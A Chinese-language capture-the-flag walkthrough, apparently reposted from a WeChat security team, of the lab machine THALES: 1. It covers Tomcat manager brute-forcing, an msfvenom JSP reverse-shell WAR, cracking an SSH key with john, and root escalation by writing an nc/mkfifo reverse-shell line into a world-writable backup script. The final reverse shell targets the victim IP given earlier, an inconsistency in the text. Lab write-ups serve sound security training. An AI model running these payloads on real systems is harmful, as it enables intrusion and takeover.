Nmap扫描主机,发现192.168.56.3主机
详细扫描一下
发现开放了22和8080端口,8080为Apache Tomcat/9.0.52服务,查看一下,网上查找了一下,发现不存在公开的漏洞
我们扫一下目录
发现一个登录的链接
还发现一个shell的目录,点击上去发现是个空白目录
猜测可能是某个黑客上传的war包,没再发现什么信息了。结合tomcat和shell目录,可以猜想应该是tomcat后台布置war包getshell,但是管理后台需要用户名和密码登录,可以使用msf进行爆破。
tomcat常见的弱口令,我们保存到一个文本中,准备爆破
user.txtadminmanagerrole1roottomcatbothpass.txtadminmanagerrole1roottomcats3cretvagrant
配置msf的option,进行爆破,爆破出账号tomcat,密码role1
进行登录
登录上去后,查看服务器状态
输入账号密码后登录上去,点击应用程序列表
这里可以上传一个war包(tomcat常见漏洞了)
我们用msf生成一个反弹shell的war包
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.56.4 LPORT=10086 -f war -o revshell.war
进行上传
上传之后,开启监听端口,访问该文件返回反弹shell
收到了一个shell,当前是一个伪shell,输入命令我们让他返回一个正常shell,
python3 -c "import pty;pty.spawn('/bin/bash')"
我们先查看当前用户下的文件
I prepared a backup script for you. The script is in this directory "/usr/local/bin/backup.sh". Good Luck.我给你准备了一个备份脚本。脚本在“/usr/local/bin/backup.sh”目录下。祝你好运。
我们查看user.txt文件,发现没有权限
我们尝试进行提取。我们用sudo -l尝试查看可以执行哪些sudo信息,但是需要输入tomcat的密码,我们输入role1当时显示错误。
我们查看一下有没有什么有用的信息
进入.ssh隐藏目录,发现里面存在公钥和私钥
保存私钥
使用用john去爆破ssh,先用ssh2john.py 脚本编译一下:
/usr/share/john/ssh2john.py id_rsa > crack.txt
进行爆破,爆破出密码为vodka06
john --wordlist=/usr/share/wordlists/rockyou.txt crack.txt
根据之前的账号,进行登录
切换账号
拿到flag
进行提取。之前我们看到的那个提示还没有用上呢,现在我们查看一下那个备份文件的代码
是一个shell文件,并且是能运行命令的,我们再看一下这个文件的权限
发现权限是777,我们是可以编辑的,并且是root用户运行的,我们插入一串反弹shell的命令
"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.3 10087 >/tmp/f"
然后在攻击机开一个端口监听等待连接就好了
成功获取到root权限,查看flag文件
原文始发于微信公众号(GSDK安全团队):Vulhub靶场 -- THALES: 1
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论